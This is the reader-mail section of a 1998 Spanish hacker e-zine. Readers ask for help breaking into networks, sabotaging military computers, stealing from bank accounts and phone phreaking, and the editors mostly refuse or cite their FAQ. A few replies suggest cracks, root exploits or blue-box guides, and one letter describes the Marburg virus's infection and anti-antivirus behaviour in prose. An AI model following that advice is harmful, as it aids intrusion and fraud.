  descubierto para que la publiquen en su proximo e-zine... esta es 
  referente a como poder pasar por alto el menu logico de un telefono 
  semi-publico de este mi pais... bue... si les interesa la idea me 
  gustaria me den un breve OK ! para saber si estamos en linea... Ah ! 
  otra cosa, ando en busca de un buen GURU que se quiera hacer cargo de la 
  tutela de este aprendiz de Hacker, si alguien esta interesado en 
  transmitir algunos de sus conocimientos con este personaje que hoy les 
  escribe estaria muy very agradecido... 

  Un abrazo viejitos... 

  Lautaro (hombregenetica) 

  <------>

  [ Pues enviamos esos trucos, que te los ponemos encantados :)
    Nosotros no damos clases privadas, pero si algun lector esta interesado
    en darte clases, pues ya os pondremos en contacto. ]

<>

  Date: Mon, 02 Nov 1998 05:05:14 GMT
  From: Dago@xxxxxxxxxxxxxx
  To: jjf_team@usa.net
  Subject: e-zine 

  hola soy de Argentina necesitaria por favor si me pueden enviar 
  las JJF de la numero seis en adelante ya que son muy dificiles de 
  conseguir y no tengo internet, pero si correo electronico, 
  me las podrias enviar por e-mail, muchas gracias 
  espero las revistas. 

  pdta: Enviame cualquier otro e-zine similar a las JJF (se que las 
  tienen) 
  mas que gracias 
  Dago 

  <------>

  [ Este es el numero 7, el ultimo que hemos sacado, y no enviamos nada.
    Muy gracioso, que te hace pensar que si no enviamos ni siquiera nuestro
    ezine, te vayamos a enviar otros ezines? ]

<>
        
  Date: Fri, 30 Oct 1998 17:32:05 GMT
  From: "Alejandro Loureda" <aloureda@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: QUE PASA!!!!!! 

  QUE PASA CON LOS VIRUS, QUE NO LOS PUEDO CARGAR, A VER SI ME DAIS UNA
  SOLUCION, NECESITO JODER A LA ARMADA ESPAOLA, ESTOY HACIENDO LA PUTA 
  MILI Y !!MILAGRO!!! SOY EL ENCARGADO DE LOS ORDENADORES DE UNA 
  FRAGATA....... PERO EL ULTIMO ARRESTO ME LO PAGAN. A VER SI ME PODEIS 
  MANDAR ALGO FUERTE O RECOMENDARMELO LO NECESITO PARA DESCARGAR 
  ADRENALINA, COLABORAR CON LA PATRIA NO? ME TIENEN HASTA LOS HUEVOS 

  <------>

  [ Y como es que estas de encargado si ni siquiera puedes ejecutar un
    simple virus? Ademas siendo el admin deberias saber que no es correcto
    destrozar sistemas informaticos. ]

<>

  Date: Fri, 30 Oct 1998 11:58:07 GMT
  From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: QUERIDOS FRIEND's 

  Que tal soy Lautaro... un pequeo aprendiz de hackers en Argentina, bien
  los molesto por lo siguiente, quisiera saber si existe la posibilidad de 
  que me envien algun programita o link para bajarlo que tenga la funcion 
  de encontrar la clave para acceder a computadoras conectadas a intranet 
  con la pc que yo trabajo... es decir, cuando abro el explorador de 
  windows quiero entrar a otras pcs via red las cuales tienen su clave de 
  acceso... esto no tiene niguna malicia solo es el hecho de hacerlo... 
  Bueno quedo a sus ordenes y muchas gracias... un abrazo 

  Lautaro 

  <------>

  [ Sorry, pero no enviamos nada, mira nuestro FAQ. Y para eso, lee bien este
    ezine :) ]

<>

  Date: Thu, 29 Oct 1998 15:29:15 GMT
  From: Juvenal Medina V. <juvenal.medina@xxxxxxxxxxxxxx>
  Subject: Hola !!. 

  Hola. 

  Antes que nada, felicidades, su pagina es excelente, pero les escribo para 
  pedirles de Favor , si es posible me enseen a ser Hacker, hace como 3
  semanas tuve problemas con uno, pero ya se calmo, y eso me hizo pensar que
  podria ser hacker con su ayuda, para defenderme de personas malas... 

  Gracias.. 

  Escriban Pronto 

  Juvenal 

  <------>

  [ Pues para eso esta este ezine, pero para defender de "malas personas" no
    necesitas ser un Hacker, simplemente debes tomar ciertas medidas de
    seguridad. ]

<>

  Date: Thu, 29 Oct 1998 14:44:02 GMT
  From: eugenio fourt de lacruz <imagen@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: aprendiz 

  Les escribo desde Chile. Estuve navegando en vuestro web y quede maravillado
  de saber de que todo lo que se habla de los hackers, es real. Estoy
  realmente muy interesado en aprender todo lo referente a los mecanismos de
  seguridad informatica. Estoy recien partiendo y me gustaria pedirles
  humildemente, si me pueden interiorizar mas del tema. Sobre todo, en la
  terminologia. Que es Hackear, Crackear, Phreaking, etc. Baje algunos
  programas y archivos de los que ustedes ofrecen. Me gustara saber usarlos,
  pero debo partir por el principio. Si me pueden instruir, aunque sea un
  simple barniz sobre el tema, se los agradeceria mucho. Aqui en Chile, hasta
  donde yo se, no se practica el Hacker (o como se diga). 

  Gracias por recibir la nota. 

  Eugenio. 
  imagen@xxxxxxxxxxxxxx 

  <------>

  [ Bueno en Chile se esta comenzado, acaso no conoces Proyecto R, el primer
    ezine underground chileno :) Pues para ello lee este ezine. ]

<>

  Date: Sat, 24 Oct 1998 08:11:06 GMT
  From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
  Subject: Holaz ;) 

  Me mola el rollo eszte, veo que sabeis. Oz mando ezte emilioz para que
  mireiz en mi peichz y la evalueiz, si no es mucho pedir, firmarz en mi
  librillo. Mi correo no es este, conque os pido que noz mandeis nada, para
  que no se entere ;)
  Mi emilio ez arargon_1@xxxxxxxxxxxxxx o uCaLu@xxxxxxxxxxxxxx okiz? hasta la
  proximaz.

  <------>

  [ Leete nuestro FAQ. ]

<>

  From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
  Subject: holaz ;) 

  Perdonar tios, antes no os he dado la peich XDDDDD. Soy la lexe, la peich
  es: http://come.to/pagina.de.BuSeS

  <------>

  [ Recibido :) ]

<>

  Date: Wed, 04 Nov 1998 17:04:25 GMT
  From: "bk abarca" <wktnoo@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net
  Subject: Subdito suyo. 

  Hola Sr.Conde
  Soy un joven de 20 aos de Sn Jos,Costa Rica. 
  Estudio Diseo Grafico en mi pas. 
  Deseo que usted me ayude a evacuar algunas dudas con 
  repecto a algunos terminos usados para denotar elementos 
  para el uso de hackers. 
  Espero que pueda ayudarme ya que me gustaria saber tanto 
  como usted, por eso lo escog a usted para que me expli 
  cara porque creo que es el que ms sabe del grupo sin despreciar 
  a nadie. 
  Para no aburrirlo ms,empiezo. 
  NOTA: Las cosas no tiene que explicarlas tanto ya que 
  mas o menos conozco de internet, chats, hardward y software, etc. 
  LA RESPUESTA PUEDE SER EN INGLES 

  - Que son SCRIPTS 
  scripts con respecto a obtener passwords y bloquear ordenadores. 

  - Que es un LAMER 

  - Que es el mundo UNIX 
  eso con respecto a cambiar mi verdadero nombre de usuario. 

  - Como hago los BOTS. 

  - Que es C 

  - Como hago para usar el programa TLO que sirve para hacer 
  llamadas al extranjero. 

  Espero de antemano me pueda ayudar. 
  Cuando quiera puede venir a mi pais y conocer,nada mas diga 
  ......................ya tiene hospedaje. 

  -GRACIAS- 

  <------>

  [ Como ya bien sabras no damos clases privadas y ni por asomo soy el
    mejor de - J.J.F. / Hackers Team -, leer FAQ. Tus respuestas seran 
    en espaol para que todos los lectores lo entiendan bien :)

    - Los script son ficheros que se escriben usando los comandos del
      sistema operativo para hacer operaciones mas rapidas. En unix
      tienes varios shell script's, en MS-DOS tiene los ".bat".

    - El termino "lamer", que es usando erroneamente por la mayoria, es para
      describir a una persona de estupido, no tiene nada que ver con las
      ganas de aprender y/o novato, lamer es un insulto.

    - Unix es un sistema operativo y no tiene nada que ver con cambiar de
      nombre de usuario.

    - Busca esa informacion por el cyberespacio. Generalmente estan hechos en
      C.

    - C, es un lenguaje de programacion.

    - No conozco ese programa que mencionas. ]

<>

  Date: Thu, 05 Nov 1998 09:25:17 GMT
  From: "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: Hacker!! 

  Salu2, quisiera unirme a su equipo de Hackers..... pero no se como, me
  dicen que baje un programa, pero me marca error!!! 

  He leido 3 de sus e-zine y me parecen fantasticos, tengo algo de 
  experiencia con UNIX..... 

  Espero respuesta Hackers.... 

  <------>

  [ Supongo que te refieres al JJF RC5 Crack Team, pues para unirte lee bien
    la seccion de NOTICIAS UNDERGROUND. Pues vas algo atrasado ya que este
    es el nunero 7 :) ]

<>

  Date:  Sat, 07 Nov 1998 11:59:20 GMT
  From:  "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Hacker!!!  
 
  Quiero unirme a su grupo, pero no se como contribuir en el e-zine!!! 

  <------>

  [ Sorry, pero - J.J.F. / Hackers Team - es un grupo cerrado, pero si que
    puedes contribuir con el ezine, escribiendo sobre algo que te interese.
    Te recomiendo leer el FAQ. ]

<>

  Date:  Mon, 09 Nov 1998 14:41:58 GMT
  From:  "osenk dest" <accord@xxxxxxxxxxxxxx>      
  To:  <"conde_vampiro@usa.net">  
 
  me han dicho que eres un maquina  y me quieroponer en contacto conmigo 

  <------>

  [ Bueno, para empezar no soy ningun maquina, simplemente una persona con
    ganas de conocer, y si quieres algo, pues escribe un mail en
    condiciones. ]

<>
   
  From:  "carlos saavedra" <carlosaave@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  pregunta  
 
  Hola conde vampiro, te escribo para decirte que estoy interesado en 
  aprender muchas cosas, sobre lo que ustedes hacen, me gustaria que me 
  dijeras que significan terminos como h/v/p, craking, hacking, phreaking, 
  para poder investigar sobre eso, y si tu me mandaras informacon te lo 
  agradeceria mucho, ya que estoy interesado en aprender alguna de estas 
  modalidades. 

  Me gustaria ser tu aprendiz para convertirme en un hacker, no para 
  causar destrosos, sino para aprender cosas que pocas personas saben y 
  para atacar paginas que atenten contra muchos principios, si me 
  respondieras te estaria muy agradecido, asi que por favor hazlo y estare 
  esperando tu mensaje. 

  <------>

  [ Te recomiendo leer nuestro FAQ y todos tus dudas seran contestadas. ]

<>
   
  From:  manic_miner@xxxxxxxxxxxxxx      
  To:  jjf_team@usa.net  
  Subject:  Hola !  
 
  Estimados amigos de JJFHackersTeam ! 

  Me interesaria que me den su opinion de mi pagina, la direccion de esta es: 
  http://www.geocities.com/SiliconValley/Pines/4539/index.html 

  A todo esto, que saben de saqueadores y raregazz ?. 

  <------>

  [ Leete nuestro FAQ. Sobre saqueadores (SET) y Raregazz, pues que siguen
    trabajando como siempre y desde aqui les enviamos un saludo :) ]

<>

  Date:  Sun, 08 Nov 1998 16:41:55 GMT  
  From:  "HACKCOL TROJANS" <hackcol_trojans@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Felicitaciones!!!!  
 
  Bueno primero quisiera felicitarlos por el exelente web y E-ZINE que 
  tienen... 
  Les escribo por que quiero que conozcan el grupo al que pertenesco, pues 
  quisiera que entablaramos una comunicacin ms continua para tener una 
  relacion como colegas; el grupo se llama (HACKCOL TROJANS)y somos un 
  grupo muy nuevo, y estamos muy interesados en relacionarnos con otros 
  grupos de hackers. nosotros somos de colombia.. 

  Quisiera pedirles unos consejitos para nuestro grupo ya que ustedes 
  llevan mas tiempo como grupo... 

  estamos en construccion de nuestro web, y quisieramos estar al dia con 
  todo lo relacionado con este gran mundo del hacker por ello les pido si 
  conocen algunas buenas listas de correo me digan ..... no importa si 
  estan en ingles. 

  Creo que una idea muy buena para todos los del hack y principalmente 
  para los grupos que ya estan establecidos seria crear una lista de 
  correo para que los grupos como JJF,hackcol trojans y muchos ms 
  estuvieran en contacto y compartieramos mucha informacion valiosa; les 
  digo esto a ustedes pues deben conocer ms grupos y si estan interesados 
  les diran para hacerlo realidad... 
  Les agradesco mucho por lo que hacen por todos los hackers del mundo 
  hispano pues creo que los E-ZINES les han sido de gran utilidad como lo 
  fue para los de hackcol trojans.... 

  espero este e-mail salga en el E-ZINE #7.. 
  GRACIAS... 

  chao. 
  ATT 
  <<<<<<<<<<<<<<<<<<<<<<<!!DaRk PoIsOn!!>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
  ********************^^HACKCOL TROJANS^^*************************** 

  <------>

  [ Thx, nosotros ya tenemos un mailing list propio pero no esta enfocado a
    estos temas, te recomiendo el numero pasado en el cual mencionabamos
    un excelente mailing list en espaol. Si quieres estar en contacto basta 
    que escribas mail's o pases por el website. Un saludo 
    - J.J.F. / Hackers Team -. ]

<>

  Date: Sun, 15 Nov 1998 17:34:10 GMT
  From: "Ezequiel Panza" <ezequielpanza@xxxxxxxxxxxxxx>
  Subject: Necesito su ayuda!!!

  Hola, Soy Conan de Argentina, esoy realmente interesado en saber de que
  manera puedo acceder a telenet, teniendo en cuenta que estoy en Argentina,
  no existe ningun local dialup para mi pero son embargo existe la
  posibilidad que pueda accesar a telenet por medio de algun tipo de terminal
  anexa a travez de la concexion de internet. Si es asi me gustaria que me
  dijeran de que manera lo puedo conseguir ya que luego de accesar a una
  terminal de estas, me es imposible conectarme a otra maquina desde la misma.
  Desde ya muchas gracias.

  La interrogante seria entonces: Como puedo tener acceso a telenet???

  <------>

  [ Has pensado en alguna forma de "realizar una llamada" al dialup aunque
    no sea local. En estos casos ahi que trabajar el aspecto phreak. ]

<>

  From: "PaMaX" <pamax@xxxxxxxxxxxxxx>
  To: "Conde Vampiro"
  Subject: Unas preguntilas 

  Hola que tal....
  Su pagina es "La MeJoR", se los digo porque entre varias veces y porque me
  copa su e-zine.....
  Yo queria pedierte un favorcito.....En mi maquina tengo el Windows 98 (una
  mierda) pero sin el no puedo usar un toco de programas que necesito....
  Bue' aca van mis preguntas
  1) Como hago para hackear redes novell que trabajan en DOS..... Es la red
     del colegio....cada uno tiene una cuenta pero yo quiero entrar a la del
     profesor (supongamos que conozco el login pero no el password).
  2) Tambien queria saber como hackear una pagina de unos amigos mios (entrar
     y modificarla)
  3) Pensaras que soy un poco estupido pero Que es hacer telnet y como se usa
     ese programa.....

  P.D me gustaria que explicaras algo sobre hacking en windows, ya se que es
      una mierda pero es lo que usa la mayoria (de los usuarios comunes)

  PD hay alguna forma de obtener cuentas de internet hackeando a alguna
     persona en IRC

  Bueno espero que me contestes, nos vemos........byez.....

  <------>

  [ Para eso esta este ezine :) Por cierto, no envies cosas raras y basta
    que envies los mail's una vez. ]

<>

  Date: Sat, 14 Nov 1998 19:15:50 GMT
  From: "bull150" <fishing247@xxxxxxxxxxxxxx>
  Subject: help!! 

  Hello i'm looking for a hacker ar a program to help me. I got a game called
  mplayer poker 1.0 on the net and i play a lot i need a program to go in and
  get my fake money to change had some but they changed upgraded or something
  to beta and they don't work anymore been looking all over and noone can
  help. Please send any info or something to me. If you can do it or have
  someone who can it is at www.mplayer.com thxs and please write back soon.

  <------>

  [ You should use a crack. ]

<>

  Date: Sat, 14 Nov 1998 15:38:35 GMT
  From: "Heitor Filho" <hroriz@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: help me 

  hi. im trying to get root access to a unix system. but i cant get the
  /etc/security/shadow file. how can i get it? 

  thanks for the attention 

  exp2222 

  <------>

  [ To obtain a copy of the shadow you must be root, but there are some tool
    you can use unless you aren't root to get it. I suggest that you use some
    kind of exploit to become root. ]

<>

  Date: Wed, 11 Nov 1998 05:04:48 GMT
  From: Ramon <astruc@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: Sobre virus muy raro que preguntaba ZeD en ultima revista 

  Hola:

  Sobre la consulta de un virus raro, ahi va la respuesta facilitada por 
  PANDA 

  El antivirus PANDA detecta perfectamente este virus. 

  Nombre: Win95/Marburg. 

  Origen: Espaa. 
  Fecha: Mayo 1998. 
  Tamao aproximado: 8.000 bytes. 
  Caracteristicas: Accion directa y polimorfico. 

  Descripcion: Se trata de un virus polimorfico para Windows 95 de 
  accion directa. Al ejecutar un fichero infectado por el virus este 
  infecta ficheros PE (portable ejecutable) del directorio actual asi 
  como de los directorios Windows y System. Por un fallo en el virus no 
  funciona en Windows NT, solo en Window 95 o Windows 98. 

  Cuando un fichero infectado se ejecuta el virus busca las rutinas del 
  KERNEL32: primero busca GetModuleHandleA y GetProcAddress y luego 
  otras 22 funciones mas. Durante la infeccion el virus usa un metodo 
  similar al del Win32/Cabanas, analiza la tabla importada del fichero 
  para GetModuleHandleA y GetProcAddress, y guarda esa direccion en el 
  codigo del virus, si no hay esas entradas en la tabla el virus 
  analiza el codigo del KERNEL32. 

  Si el virus no es capaz de localizar las funciones del KERNEL32 
  retorna al codigo del fichero inicial. De todas formas reserva un 
  bloque de memoria del sistema, copia en el su codigo (lo necesita 
  para ejecutar el polimorfismo) y busca los ficheros para infectarlos. 

  El virus escribe su codigo al final de los archivos aumentando el 
  tamao de estos en unos 8.000 bytes, tras salvar su codigo en el 
  fichero el virus lo encripta con su rutina polimorfica. Dependiendo 
  de la estructura del fichero el virus hace varios trucos para hacer 
  la deteccion y desinfeccion mas compleja: reemplaza la direccion de 
  comienzo en la cabecera PE por la suya, o salva la instruccion de 
  salto al virus en la direccion de comienzo del fichero y no modifica 
  la cabecera, o escribe en el punto de entrada una rutina polimorfica 
  "basura" seguida de la instruccion de salto al virus. 

  Antes de infectar los ficheros el virus borra los siguientes ficheros 
  de datos de antivirus: Anti-vir.dat, chklist.ms, avp.crc y ivb.ntz. 
  Mientras infecta el virus chequea los nombres de los ficheros y no 
  infecta aquellos que tienen la letra "V" asi como los antivirus 
  Panda, F-prot y Scan. 

  Dependiendo de la fecha del sistema (en los 3 meses siguientes a la 
  infeccion cuando un fichero infectado es ejecutado a la misma hora en 
  que se produjo la infeccion) el virus saca en posiciones aleatorias 
  de la pantalla el icono de error estandar (un circulo rojo con una 
  cruz blanca). 

  El virus contiene el siguiente texto: 

  " GetModuleHandleA GetProcAddress CreateFileA CreateFileMappingA 
  MapViewOfFile UnmapViewOfFile CloseHandle FindFirstFileA 
  FindNextFileA 
  FindClose VirtualAlloc GetWindowsDirectoryA GetSystemDirectoryA 
  GetCurrentDirectoryA SetFileAttributesA SetFileTime DeleteFileA 
  GetCurrentProcess WriteProcessMemory LoadLibraryA GetSystemTime 
  GetDC 
  LoadIconA DrawIcon 

  [ Marburg ViRuS BioCoded by GriYo/29A ] 
    KERNEL32.dll USER32. 

  Saludos :) 

  astruc@smileyface.com 
  http://www.olivet.com/astruc/index.htm32. 

  <------>

  [ Thx por el aviso y ya esta aqui la respuesta para Zed. ]

<>

  Date: Sun, 22 Nov 1998 08:50:08 GMT 
  From: vicente corral collantes <vinny@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: (no subject) 
  
  Necesito un buen hacker capaz de entrar en una pagina web, en el disco 
  duro de unas personas, no son organismos oficiales, pagare el trabajo, 
  un saludo. 
  Gracias. 

  <------>

  [ XDDDDD si lo hicieramos por dinero lo mas seguro a estas alturas
    seriamos millonarios, leete nuestro FAQ y olvidamos. ]

<>

  Date: Fri, 20 Nov 1998 07:22:19 GMT 
  From: "ALEJANDRO VALENTIN" <a080879@xxxxxxxxxxxxxx>     
  Subject: Hola Me estoy iniciando 
  
  HEY conde te habla un futuro hackers quieri si tu puedes desde luego que 
  me mandes por un e- mail todo lo referente al negocio del hackeo ya que no 
  se absolutamente nada pero te aclaro que solo hago esto por aprender a 
  manipular un virus por saber rebentar sistemas, en fin por aprender si 
  puedes me mandas un algoitmo pra hacer los virus ya que no pude entra a 
  esta seccion del la pagina 

  Recuerda mandarme trucos que un experto hacker no olbida 

  <------>

  [ El hacking no es un negocio y si tantas ganas tienes de aprender lee bien
    este ezine. ]

<>
 
  From: "Guillermo Suarez" <glsuarez@xxxxxxxxxxxxxx>     
  To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx> 
  Subject: Saludo 
  
  Hola Conde !
             
  Espero que estes bien.
             
  Te escribo con el animo de decirte que me parece formidable el trabajo del
  web JJF Hackers Team y me gustaria preguntarte acerca de que si sabes algo
  acerca de los hackers en Colombia; ya que yo soy de Cali (Colombia) y me
  gustaria saber como poder ingresar al mundo de los Hackers, Crackers, etc.
             
  Agradezco tu pronta respuesta y disculpa las molestias.
          
  Atte
             
  Memo

  <------>

  [ Pues realmente no se como estan las cosas por Colombia, se que hemos
    recibido mail's de gente por alli, si os interesa os podemos poner en
    contacto. ]

<>
 
  From: Alejandro Alan Dominguez Perez <al751181@xxxxxxxxxxxxxx>    
  To: conde_vampiro@usa.net 
  Subject: preguntas 
  
  Buenos X: 

  Me encontraba chateando en el mirc cuando me llego un mail de una 
  persona que me decia que el podia cambiar la pogramacion de las tarjetas 
  inteligentes de los sistemas de television por satelite digitales es 
  cierto esto ? se puede realizar? Como se hace? 

  A|X-Alan 
  al751181@xxxxxxxxxxxxxx

  <------>

  [ Todo es posible pero ya se sabe que por el IRC, la gente hace maravillas
    ;-) ]

<>
 
  From: charlott@xxxxxxxxxxxxxx (Carlos Orlando Chacon Vergara)     
  
  Hola:
  necesito informacion  sobre BO y la nea version? Como lo desintalo? paso a
  paso. El trojano esta en mi Pc.

  <------>

  [ Te recomiendo la siguiente utilidad para eliminar el BO.

    http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]

<>

  Date: Tue, 17 Nov 1998 02:31:08 GMT 
  From: "pepe brasas" <muldem@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 

  hola conde vampiro: 

  ante todo felicitaros a todos por vuestra pagina y por vuestra pequena 
  revistilla que aunque no entienda ni la mitad creo que es bastante buena. 

  y es por eso por lo que os escribo,porque soy un principiante en esto de
  hackear y en el mundo de la informatica.no tengo ni iedea de como 
  hackear una pagina ya que no entiendo la mayoria de los terminos que 
  utilizais y tambien porque mi conocimient sobre programacion es muy 
  pobre. 
  mi ilusion seria poder hackear algunas de las jodidas paginas del poder 
  y llegar por lo menos a tener un minimo conocimiento sobre el tema pero 
  por ahora no tengo las bases suficientes aunque me gustaria 
  adquirirlas.ahora es cuando es el momento en el que tengo que 
  pedirte/pediros que si por favor me podriais ayudar aunque solo fuera un 
  poquito ahora en el comienzo. 
  muchas gracias. 

  pepe brasas 

  <------>

  [ Como siempre decimos lee nuestro FAQ y este ezine con mucha atencion. ]

<>

  Date: Mon, 16 Nov 1998 15:28:03 GMT 
  From: Juan_Carlos_Valdes" <agus23@xxxxxxxxxxxxxx>    
  To: "Conde Vampiro" 
  Cc: "Conde Vampiro" 
  Subject: ayudame porfavor 
  
  Me llamo Juan Carlos y soy de Argentina
  Hola como estas, espero que bien, te comento que estoy tratando de iniciarme
  en este ambiente del Hacking, aunque me parece bastante complicado, pero se
  que lo voy a lograr algun dia, es que no estoy pasando una buena situacion
  economica y espero poder safar de esto algun dia. Solo te pido un poco de
  ayuda (si quereis y teneis ganas de ayudarme). Te cuento que se operar,
  programar, y reparar oscea no soy un analfabeto en esto y se que si me
  brindas un poco de tus conocimientos los voy a aprender facilmente yo voy a
  leer todos los documentos que encuentre relacionado con el hacking. El tema
  que me intriga y creo que es lo unico que me va a hacer safar de esto es si
  me podeis ensear como se hace para sacar dinero de otras cuentas y ponerla
  en la mia. Tengo una tarjeta Banelco del Banco Rio y puedo sacar dinero con
  ella del cajero (Lastima que esta vacia) pero la cuenta esta abierta hasta
  fin de ao. Yo lo que queria es pasar dinero de otras cuentas a mi tarjeta
  y sacarla del cajero. ?Me podeis ayudar? Me podeis brindar esa
  informacion? te ruego que me ayudes mi situacion es bastante complicada y
  mis Padres hacen todo lo posible para que siga estudiando. Te cuento que
  estoy en la Facultad y estudio Ingenieria en Sistemas, y me gustaria seguir
  con la carrera, pero todo cuesta dinero y no consigo trabajo por ningun 
  lado, y cuando encontras te quieren explotar con poco dinero ($400) y te
  dicen que es Full-Time (9:00 a 21:00hs)  y no puedo aceptar porque quiero
  seguir con mi carrera. Ojala que pueda terminarla, mi sueo es poder irme a
  otro pais donde se valoren los conocimiento y no te quieran explotar como
  sucede en Buenos Aires - Argentina. Aca se quieren aprovechar y sacar ventaja
  de cualquier situacion.
  Te cuento la ultima. hace poco fui a Comm1 S.A por un trabajo que ofrecian
  de Tecnico en computacion, esta empresa es la mas importante aqui y estan
  baados en plata, me preguntaron cuantas horas podria trabajar y yo les
  dije que de las 9 hasta las 17:00, 8hs en total y sabes cuanta plata me
  querian dar? me daban $390 y sin obra social encima, porque decian que eran
  pocas horas las que trabajaba y mas horas yo no podria por la facultad, ese
  dinero que me daban no me servia para nada porque tenia un viaje de 1h 20m
  hasta alli y por mes saque la cuenta me gastaria $150 en viaje. Ves lo que
  te digo. esto lleno de explotadores y me da bronca (te aclaro que $
  dolares, muy poca es la diferencia por ahora) Por eso te pido por favor que
  me ayudes a poder hacer esto. Algun dia te devolvere el favor de alguna
  manera y si haces esto por mi no lo olvidare jamas. Aqui te dejo mi
  direccion electronica para que me escribas. Desde ya te agradezco por leer
  mi carta  
  agus23@xxxxxxxxxxxxxx
             
  sin otro particular, te saludo muy atentamente.

  <------>

  [ No considero que tu situacion justifique el robo de informacion o peor
    todavia monetaria, lo que debes hacer es hablar con la uni sobre una
    beca o conseguir un trabajo gracias a tus conocimientos. ]

<>

  Date: Mon, 23 Nov 1998 08:25:33 GMT 
  From: manic_miner@xxxxxxxxxxxxxx     
  To: jjf_team@usa.net 
  Subject: buena idea. 
  
  Estimado colega: 

  Esto no es un spam. 

  Seria grato poder contar contigo de una idea que consiste en publicitar,
  por medio de banners tu pagina 
  este proyecto es TOTALMENTE GRATUITO, y sin ningun 
  tipo de compromiso de tu parte. 

  Podes ver la prueba en http://www.geocities.com/Baja/Trails/4914/ y en 
  http://camaleon.com.ar/sponsors.htm (solo el primer banner) 

  Si estas interesado podes contactar conmigo en: 
  manic_miner@xxxxxxxxxxxxxx 

  Gracias. 

  <------>

  [ Nosotros ya tenemos la publicidad que querremos :) pero si a alquien le
    interesa pues ya sabe. ]

<>

  Date: Fri, 20 Nov 1998 18:51:05 GMT 
  From: "Marcelo F. Lascurain" <mlascu@xxxxxxxxxxxxxx>     
  Subject: Problemas con el EZINE 

  No se si sere el unico pero he tenido problemas para poder bajar el N 6,
  solo me deja hacerlo hasta el curso de linux, y nada mas. Probe como
  indican, apretando SHIFT antes de pinchar en el link, pero nada.    
  Sino es demasiado pedir, (disculpen), si pueden enviarmelo por mail, si
  es zipeado mejor.    
  Y adelante con su magazine, junto con SET y RAREGAZZ son lo mejor del 
  underground.
  Desde Santa Fe, Argentina un cordial saludo.
  Marcelo              

  <------>

  [ Pasate por nuestro FTP. ]

<>
                
  Date: Wed, 18 Nov 1998 14:26:21 GMT 
  From: "ortiz jim" <ortiz_jim@xxxxxxxxxxxxxx>     
  To: jjf_team@usa.net 
  Cc: ortizj@xxxxxxxxxxxxxx 
  Subject: Anonmail 
  
  ESPAOL: 
  que tal envio este e-mail, solo para preguntar que tan probable es que 
  identifiquen mi IP al enviar un 
  e-mail para joder, via Telnet, utilizando el puerto 25. 

  Ha estan excelentes los archivos para hackear, saludos 

  ENGLISH: 

  that such I send this e-mail, alone to ask that so probable is that 
  identify my ++IP upon sending a e-mail for joder, by ++Telnet, using the 
  port 25. 

  It has are excellent the files for hackear, regards 

  <------>

  [ Te recomiendo el primer curso de hack del primer ezine, ya que alli esta
    todo explicado. ]

<>

  Date: Tue, 17 Nov 1998 12:48:06 GMT 
  From: "Luis Fernando Tirado Correa" <luisfer32@xxxxxxxxxxxxxx>     
  To: jjf_team@usa.net 
  
  Hola amigos!! 

  les escribo desde colombia!! 

  reciban un gran saludo!! 

  les escribo con el fin de que me manden la traduccion de texto de como 
  hacer un blue-box!! 

  necesito hacer un aparatico de estos porque mi cuenta de servicios es 
  gigantesca!! 

  gracias!! y hasta pronto 

  <------>

  [ Pasate por nuestra seccion de Phreak. ]

<>

  Date: Tue, 17 Nov 1998 08:24:28 GMT 
  From: TVH <tavaha@xxxxxxxxxxxxxx>     
  To: jjf_team 
  Subject: peticion 
  
  Hola, 
  Bueno, a pesar de haber incluido vuestro e-zine ya desde hace tiempo en la 
  taberna, nos gustaria, de todas formas pediros permiso para distribuirla en la 
  nueva taberna. No creiamos que hiciera falta, puesto que se trata de una 
  seccion donde se intenta promocionar los magazines espaoles. Aun asi, 
  enmendamos el error pidiendoos permiso formalmente. 
  Esperamos vuestra respuesta. 
  Saludos cordiales. 

  <------>

  [ No hace falta pedirnos permiso, pero es conveniente que nos aviseis para
    que estemos al tanto, os pongamos en el ezine como distribuidores
    oficiales y tb debeis poner nuestro logo de distribuidor.
    Leete nuestro FAQ. ]

<>

  Date: Sun, 22 Nov 1998 20:02:22 GMT 
  From: "jac" <esesistemas@xxxxxxxxxxxxxx>     
  To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx> 

  <------>

  [ Si envias un mail pon al menos un mensaje!! ]

<>

  Date: Sun, 22 Nov 1998 17:31:41 GMT 
  From: "Juan Carlos" <spawn2@xxxxxxxxxxxxxx>     
  Subject: Unix 
  
  Hola Conde, creo ke tu revista es genial (y no es por hacer la pelota), 
  tiene temas interesantes y los explicais muy bien. 
  Veras yo queria pedirte un favor, es que si tienes alguna guia de Unix o 
  Linux, alguna especie de manual de comandos y todo lo necesario para 
  controlar unix perfectamente 
  espero tu respuesta, aqui te dejo mi direccion: 

  Spaw2@xxxxxxxxxxxxxx

  Gracias 

  <------>

  [ Leete el fantastico articulo de Letal en el numero 6 de nuestro ezine. ]

<>

  Date: Sun, 22 Nov 1998 13:45:23 GMT 
  From: "Bartolome Dominguez Martinez" <tolome@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: sobre todo 
  
  hola 
  he estado en tu web y hasta el momento ha sido la mejor del tema, pero 
  no he podido bajarme nada me haparecia lo del not fount lo siento si soy 
  breve pero tengo prisa. 
  haber si me podrias mandar datos sonrelas cajas azules y la de cromo 
  pero en espaol. 

  jhasta otra 
  cuento con tigo para que lo hagas. 

  mi e-mail es tolome@xxxxxxxxxxxxxx
  s 

  <------>

  [ Pasate por nuestra seccion de Phreak. ]

<>

